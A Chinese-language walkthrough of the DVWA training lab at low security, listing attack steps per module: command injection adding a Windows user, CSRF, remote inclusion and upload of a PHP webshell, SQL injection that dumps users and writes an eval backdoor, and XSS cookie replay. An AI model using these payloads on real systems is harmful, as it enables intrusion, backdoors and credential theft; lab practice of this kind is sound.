dvwa 设置级别为low 1、brute force(暴力破解) 启动burpsute,暴力猜解 admin用户密码
2、Command Injection(命令行注入) 127.0.0.1 & net user zs 123 /add 127.0.0.1 & net user
3、csrf (跨站信息伪造) 启动 burp ,拦截csrf 的密码更改,生成csrf文档,写入 index.htm,将index.htm 复制到自建服务器 的c:\inetpub\wwwroot 诱使正正在操作后台者,访问 自己服务器的index.htm页面
4、File Inclusion (文件包含) 将“创建一句话木马.txt” 更名为aa.txt 并复制到 自建服务器 c:\inetpub\wwwroot dvwa "file inlcude" 包含文件为http://自建服务器ip/aa.txt,注意创建木马后的url地址 启动过狗菜刀,连接一句话木马
5、File upload (文件上传) 将一句话木马更改扩展名为.jpg 用burpsuite 拦截上传操作,然后重新更改文件名为.php 启动过狗菜刀,连接一句话木马 http://192.168.226.175/dvwa/hackable/uploads/aa.php
6、Insecure CAPTCHA (不安全的验证码) ( 申请google验证码信息:
6LdJJlUUAAAAAH1Q6cTpZRQ2Ah8VpyzhnffD0mBb
6LdJJlUUAAAAAM2a3HrgzLczqdYp4g05EqDs-W4K )
step=1 ---> step=2
7、sql Injection (sql注入)
1' and '1'='1
1' order by 2 #
1' union select 1,database() #
1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa' #
1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #
1' union select user,password from users #
8、sql Injection (Blind) (sql盲注)
1' and length(database())=? # 1' and ascii(substr(database(),1,1))>100 # 1' and (select count (table_name) from information_schema.tables where table_schema=database() )=? # 1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1))=? # 1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))>103 # 1' and (select count(column_name) from information_schema.columns where table_name='users')=? # 显示存在 1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit ?,1),1,1))>116 # (user字段)
1' union select 1,'<?php @eval($_POST["pass"]) ?>' into outfile 'c:/wamp/www/dvwa/my.php' #
9、weak Session IDs (弱会话id) dvwaSession=3; security=low; PHPSESSID=
10、XSS(DOM) (XSS: 跨站脚本攻击) 11、XSS(Reflected)
12、XSS(Stored) zs 使用收集到的客户cookie值,替代本机cookie, 跳过身份认证,访问他人网站信息